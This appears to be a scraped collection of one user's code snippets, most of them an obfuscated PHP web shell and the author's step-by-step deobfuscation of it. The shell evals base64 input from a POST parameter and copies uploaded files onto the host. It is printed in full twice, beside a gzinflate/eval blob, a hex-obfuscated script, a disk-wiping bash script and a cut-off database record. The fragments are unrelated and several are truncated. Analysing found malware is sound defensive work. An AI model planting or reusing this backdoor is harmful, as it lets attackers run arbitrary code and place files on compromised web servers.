d0n601

#!/usr/bin/env python3
from datetime import datetime
import sys
import os
from os import listdir
import re

def show_help():
    message='''
********************************************************

d0n601

<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>

d0n601

<?php eval(gzinflate(base64_decode('HZzHkuNQdgV/ZXYzE1jAu5BCE/CW8JYbBbz3Hl8vlhbdm64iAbx3z8lkg/jP//z3f+Z6/kdxJv2/qrcZyz7Zi3+lyVYQ2P/mRTblxb/+KX9fuZs+TN4F4O2dlsjsjzZRtOOoX1YVUH3UzSGhUNKPUL/RqBygcNTRQXCmQTA6lvkElZZsSQccfZuWxRAkLFXEX+Y8S10AZd0C5RJaHYUM37QI9sBoTSoMv3viNFAQm1afx7wpJSEhsNmq01ccP4/1acjHcRjOu10iZgTGfWT1teuwYpwck5ERspP9cpJLGKeYujdbvg2faz4Vzz6zl9ef45HcdrP8mue8qGqfwu4iTN0/+YErSd2tEpKgtFSamBuhnjfS0qMOMXhqcRfqbYfo8+PUHXZrZOd2D3ugu1xoKu2Kkz5uL8sOzRpsHzKPSbVvcTH3MPzDbcjHSG/SnCqOw+/R71WfOj6ZiHCQ7k9NTC1Zn2bJtiSh0Yn4MkS9dsg0LcoikZvMRcW+5/TPUaY8Fha8Cn396QkzhR7PM6/rVRzfwG5fdL6NUtCahcWTbLCWHrm+461espCVcDoYJ/Ydm08Ij9gNDunyLQWyEZWZb3uxsTOVqRqjRQwL3jBWdHFQbQHp9I7bCp0B/Wq9saRbIGzpBCq39um+5Qtyn5UQKrQOecs5fIp6EpRpWZX/ek9+6ZTHWxaG4H3/EbX0NXQ9KfMncDQ8RlzCwuYaBJ4ZUK2JPSwd/6iKQz7kTqkgMQNiLPUUY2trkZRDaKh8+7lTQxymq1SYR2+JBM1pVlVwhyMr/SkFUNDXi8HKV/yyuAPC33hVyDlnjUyYona2nQsIxZmGoR0e7AbDUNashWfv/d6Ay8jq2/jByr3W+CCKUAhqh2aaf1tYysuUJLiPMXylRxCScKMeJngumDbrkIyI3x7XXNqmkf7eKa+C1qlhgiyIJdh2bu57vt0uA814b8ZnJe/bydz1UEnGV07JFraWVCFomNB

d0n601

<?php ${"\x47\x4c\x4fB\x41LS"}["s\x70\x72\x62\x77l\x6fi"]="\x6f\x75t_\x64\x61\x74\x61";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["w\x64k\x71e\x67\x62t\x73"]="\x6b\x65\x79\x33";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x65\x64\x73ob\x64\x67\x66\x77"]="\x6b\x65\x79\x32";${"\x47L\x4f\x42\x41\x4c\x53"}["\x63x\x76t\x73\x72\x63\x77r"]="\x6e";${"G\x4c\x4fBAL\x53"}["ud\x77\x77\x78e\x69\x6e\x6as"]="c";${"G\x4c\x4fB\x41\x4c\x53"}["ct\x78\x67\x76qg\x6cvo\x67"]="\x70";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x73j\x68y\x77\x6e\x68"]="\x73";${"\x47L\x4f\x42ALS"}["\x72d\x68ii\x76\x67\x72\x6d"]="\x62a\x73\x656\x34\x69\x6ev";${"\x47\x4cO\x42\x41\x4cS"}["\x6f\x69\x6d\x66\x77p\x62v\x73"]="i";${"\x47\x4cO\x42\x41\x4cS"}["\x78\x65\x66ud\x77\x65\x6b\x71\x78\x72"]="b\x61s\x65\x36\x34\x63\x68\x61r\x73";${"\x47LO\x42\x41LS"}["\x6a\x6boz\x74\x6f\x67\x6b"]="\x64";${"\x47\x4c\x4f\x42\x41LS"}["\x6a\x66du\x62\x66\x73y"]="\x61";${"G\x4c\x4f\x42AL\x53"}["\x70\x70\x6d\x75\x79\x76i"]="\x72";${"\x47L\x4f\x42A\x4c\x53"}["\x66km\x79\x71\x65\x78"]="\x61\x6b";${"\x

d0n601

<?php 

	echo 7457737+736723 . "\n"; // 8194460 some sort of identification I'm sure.

	$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=")  . "\n" ; // base64_decode

	echo $raPo_rZluoE; // Figure out what the first string says

	$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=")  . "\n"; 

d0n601

<?php
	
	echo 7457737+736723; // Still probably an id of some sort.

	eval(base64_decode(($_POST[id])); // Decodes POST['id'], that becomes the file name given to the eval() function.

	// Probably an 'all good' response from the remote server.
	if( $_POST['up'] == 'up') {
		@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']); // Malicious files from remote server copied to host.
	}

d0n601

<?php 

	echo 7457737+736723; // Some integer, maybe an id of some sort.

	$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");  // Some string

	$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."="); // Another string

	eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));  // This is dangerous looking, an eval() call based on a POST request.

d0n601

<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>

d0n601

#!/bin/bash
#Basic while loop to whipe a harddisk.

# Show us the disks.
sudo lsblk -o NAME,FSTYPE,SIZE,MOUNTPOINT,LABEL

# Prompt for disk to kill.
echo What disk to you want to kill \(ex: sdb\)
read killdisk
killdisk="/dev/$killdisk"

d0n601

{
	"_id" : ObjectId("5ad0eff286e6f08857516dc5"),
	"Zip" : "92626",
	"FinderSponsor" : true,
	"MapMarkerLevel" : 3,
	"ActiveProductCodes" : [
		"facebook",
		"finder-sponsor",
		"listing2",
		"logo",